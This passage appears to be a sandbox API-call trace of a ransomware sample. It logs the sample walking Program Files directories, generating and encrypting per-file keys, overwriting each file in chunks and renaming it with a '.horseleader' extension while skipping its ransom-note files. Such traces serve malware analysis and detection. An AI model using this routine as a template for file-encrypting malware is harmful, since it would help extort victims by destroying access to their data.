out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.570] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.570] CloseHandle (hObject=0x158) returned 1 [0245.570] GetProcessHeap () returned 0x780000 [0245.570] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.570] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL.horseleader") returned 83 [0245.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll.horseleader")) returned 1 [0245.572] GetProcessHeap () returned 0x780000 [0245.572] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.572] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6a43200, ftCreationTime.dwHighDateTime=0x1cb700e, ftLastAccessTime.dwLowDateTime=0xd5807780, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xf6a43200, ftLastWriteTime.dwHighDateTime=0x1cb700e, nFileSizeHigh=0x0, nFileSizeLow=0x39580, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IETAG.DLL", cAlternateFileName="")) returned 1 [0245.572] lstrcmpiW (lpString1="IETAG.DLL", lpString2="Windows") returned -1 [0245.572] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL") returned 70 [0245.572] StrStrIW (lpFirst="IETAG.DLL", lpSrch=".horseleader") returned 0x0 [0245.572] lstrcmpW (lpString1="IETAG.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.572] lstrcmpW (lpString1="IETAG.DLL", lpString2="_uninstalling_.png") returned 1 [0245.572] lstrlenW (lpString=".testttjffg") returned 11 [0245.572] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL", lpSrch=".testttjffg") returned 0x0 [0245.572] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.572] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.575] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL") returned 70 [0245.575] StrStrW (lpFirst="IETAG.DLL", lpSrch=".txt") returned 0x0 [0245.575] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=234880) returned 1 [0245.575] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.575] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.578] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.579] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.579] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1a2c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.580] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.580] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.580] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x34580, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.580] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.585] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.585] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.585] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.585] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.586] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.586] CloseHandle (hObject=0x158) returned 1 [0245.586] GetProcessHeap () returned 0x780000 [0245.586] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.586] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL.horseleader") returned 82 [0245.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll.horseleader")) returned 1 [0245.587] GetProcessHeap () returned 0x780000 [0245.587] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.587] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x18b80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="IMCONTACT.DLL", cAlternateFileName="IMCONT~1.DLL")) returned 1 [0245.587] lstrcmpiW (lpString1="IMCONTACT.DLL", lpString2="Windows") returned -1 [0245.588] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL") returned 74 [0245.588] StrStrIW (lpFirst="IMCONTACT.DLL", lpSrch=".horseleader") returned 0x0 [0245.588] lstrcmpW (lpString1="IMCONTACT.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.588] lstrcmpW (lpString1="IMCONTACT.DLL", lpString2="_uninstalling_.png") returned 1 [0245.588] lstrlenW (lpString=".testttjffg") returned 11 [0245.588] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL", lpSrch=".testttjffg") returned 0x0 [0245.588] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.588] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.590] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL") returned 74 [0245.590] StrStrW (lpFirst="IMCONTACT.DLL", lpSrch=".txt") returned 0x0 [0245.590] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=101248) returned 1 [0245.590] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.590] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.593] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.593] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.594] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x9dc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.594] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.595] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x13b80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.595] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.596] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.596] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.596] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.596] CloseHandle (hObject=0x158) returned 1 [0245.596] GetProcessHeap () returned 0x780000 [0245.596] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.597] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL.horseleader") returned 86 [0245.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IMCONTACT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\imcontact.dll.horseleader")) returned 1 [0245.597] GetProcessHeap () returned 0x780000 [0245.597] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.598] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f42f7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LISTS", cAlternateFileName="")) returned 1 [0245.598] lstrcmpiW (lpString1="LISTS", lpString2="Windows") returned -1 [0245.598] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS") returned 66 [0245.598] lstrcmpW (lpString1="LISTS", lpString2=".") returned 1 [0245.598] lstrcmpW (lpString1="LISTS", lpString2="..") returned 1 [0245.598] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.598] GetProcessHeap () returned 0x780000 [0245.598] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.598] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*") returned 68 [0245.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f42f7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0245.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.599] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\.") returned 68 [0245.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.599] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f42f7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="..", cAlternateFileName="")) returned 1 [0245.599] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.599] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\..") returned 69 [0245.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.600] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef07e390, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x33bd0262, dwReserved1=0xcc71a064, cFileName="1033", cAlternateFileName="")) returned 1 [0245.600] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0245.600] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033") returned 71 [0245.600] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0245.600] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0245.600] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.600] GetProcessHeap () returned 0x780000 [0245.600] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.600] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*") returned 73 [0245.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef07e390, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0245.600] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.600] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\.") returned 73 [0245.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.600] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed123f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef07e390, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="..", cAlternateFileName="")) returned 1 [0245.601] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.601] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\..") returned 74 [0245.601] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.601] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.601] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x310fad00, ftCreationTime.dwHighDateTime=0x1c2d758, ftLastAccessTime.dwLowDateTime=0xeed123f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x310fad00, ftLastWriteTime.dwHighDateTime=0x1c2d758, nFileSizeHigh=0x0, nFileSizeLow=0x22d6, dwReserved0=0x448348bd, dwReserved1=0x6d5c4c3f, cFileName="DATES.XML", cAlternateFileName="")) returned 1 [0245.601] lstrcmpiW (lpString1="DATES.XML", lpString2="Windows") returned -1 [0245.601] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 81 [0245.601] StrStrIW (lpFirst="DATES.XML", lpSrch=".horseleader") returned 0x0 [0245.601] lstrcmpW (lpString1="DATES.XML", lpString2="#Decrypt#.txt") returned 1 [0245.601] lstrcmpW (lpString1="DATES.XML", lpString2="_uninstalling_.png") returned 1 [0245.601] lstrlenW (lpString=".testttjffg") returned 11 [0245.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML", lpSrch=".testttjffg") returned 0x0 [0245.601] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0245.601] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0245.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0245.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 81 [0245.602] StrStrW (lpFirst="DATES.XML", lpSrch=".txt") returned 0x0 [0245.602] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=8918) returned 1 [0245.602] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x22d6, lpOverlapped=0x0) returned 1 [0245.605] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffdd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.605] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x22d6, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x22d6, lpOverlapped=0x0) returned 1 [0245.605] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.605] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0245.605] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0245.605] CloseHandle (hObject=0x15c) returned 1 [0245.606] GetProcessHeap () returned 0x780000 [0245.606] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfe8 [0245.606] wnsprintfW (in: pszDest=0x7dbfe8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.horseleader") returned 93 [0245.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.horseleader")) returned 1 [0245.607] GetProcessHeap () returned 0x780000 [0245.607] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfe8 | out: hHeap=0x780000) returned 1 [0245.607] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a301d00, ftCreationTime.dwHighDateTime=0x1c2d7fa, ftLastAccessTime.dwLowDateTime=0xeefe5e10, 